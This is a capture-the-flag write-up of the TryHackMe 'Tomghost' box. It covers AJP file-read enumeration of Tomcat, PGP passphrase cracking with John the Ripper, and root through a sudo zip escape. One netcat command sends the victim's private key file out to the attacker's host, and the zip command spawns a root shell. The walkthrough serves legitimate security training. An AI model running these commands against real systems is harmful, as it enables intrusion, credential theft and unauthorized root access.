###### tags: `write up`

# TryHackMe Tomghost writeup

---

## <font color=red>Step 1. Recon</font>

```
nmap -sS -sV -T5 <ip>
```

![](https://i.imgur.com/OPH2Zwf.png)

<font size=4.5>Four ports are open, and two of them are interesting: 8080 (Apache Tomcat) and 8009 (AJP).</font>

---

## <font color=red>Step 2. Enumeration</font>

<font size=4.5>The services on ports 8009 and 8080 point us at the Apache JServ Protocol. Apache Tomcat is a servlet container for Java web applications, and AJP is the binary protocol a front-end web server (typically Apache httpd with mod_jk or mod_proxy_ajp) uses to forward requests to Tomcat. The AJP connector listens on port 8009 by default. It is designed to sit behind a trusted reverse proxy, so it accepts request attributes from whoever connects to it; exposing it directly to the network is the root of the problem on this box.</font>

<font size=4.5>Gobuster against the web service on 8080 finds nothing useful; it is a rabbit hole. So we turn our attention to the <font color=red>AJP vulnerability.</font></font>

<font size=4.5>Searching Exploit-DB shows a file read/inclusion vulnerability in this AJP connector: a client that speaks AJP directly can make Tomcat return any file under the web application's root directory. To get something useful out of it, <font color=red>we need a configuration file that leaks information.</font> `/WEB-INF/web.xml`, the application's deployment descriptor, is a good first choice: Tomcat never serves it over HTTP, but it is readable through this bug.</font>

![](https://i.imgur.com/FnKYAQh.png)

![](https://i.imgur.com/LySpa8L.png)

<font size=4.5>Fortunately, web.xml contains a set of credentials. Let's try them over SSH on port 22.</font>

![](https://i.imgur.com/mOr4eKv.png)

<font size=4.5>There is a home directory for a user called merlin, who is probably the important user on this box. Moving into the directory, two interesting files stand out: tryhackme.asc and credential.pgp.</font>

![](https://i.imgur.com/1Ju2voX.png)

<font size=4.5 color=orange>**Additional information: PGP (here the GnuPG implementation) is public-key cryptography software. It generates a key pair: the public key encrypts, the private key decrypts. The private key itself is normally protected by a passphrase, and that passphrase is what we will attack.**</font> <font size=4.5>Opening tryhackme.asc confirms it is an ASCII-armored private key block.</font>

---

## <font color=red>Step 3. Break the private key</font>

<font size=4.5>To crack the key's passphrase we first need to move tryhackme.asc to our Kali machine. Start the listener on the local host first, then push the file from the remote host (scp over the SSH session we already have would work just as well):</font>

```
# on the local host (start this first)
sudo nc -lvnp 443 > tryhackme.asc

# on the remote host
nc 10.4.36.186 443 < tryhackme.asc
```

![](https://i.imgur.com/GK2zamH.png)

<font size=4.5>Extract a crackable hash from the key with gpg2john:</font>

```
gpg2john tryhackme.asc > hashes.txt
```

![](https://i.imgur.com/zYdZ5Ra.png)

<font size=4.5>Crack it with John the Ripper and the rockyou wordlist, then show the recovered passphrase:</font>

```
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
john --show hashes.txt
```

![](https://i.imgur.com/8YlrkaB.png)

<font size=4.5>Import the key and use it to decrypt the credentials. gpg prompts for the passphrase John just recovered:</font>

```
gpg --import tryhackme.asc
gpg --decrypt credential.pgp
```

![](https://i.imgur.com/ZEIxAwn.png)

<font size=4.5>The decrypted file gives us merlin's password, so we can switch to that user with su.</font>

![](https://i.imgur.com/XotKcnq.png)

---

## <font color=red>Step 4. Privilege escalation</font>

<font size=4.5 color=red>Running sudo -l shows that merlin can execute the zip binary as root:</font>

![](https://i.imgur.com/k3bDJpo.png)

<font size=4.5>GTFOBins lists a sudo escape for zip: [GTFOBins](https://gtfobins.github.io/gtfobins/zip/#sudo)</font>

![](https://i.imgur.com/LoB9gsi.png)

<font size=4.5>The trick is zip's -T option (test the archive after creating it) combined with -TT (run this command instead of unzip to do the test). zip appends the archive name to the test command and hands it to the shell, so `sh #` starts a shell and comments the archive name away. Because sudo runs zip as root, the shell is root too. This is arbitrary command execution; running the commands from GTFOBins:</font>

```
TF=$(mktemp -u)
sudo zip $TF /etc/hosts -T -TT 'sh #'
```

![](https://i.imgur.com/u19jeNg.png)

ROOT~~~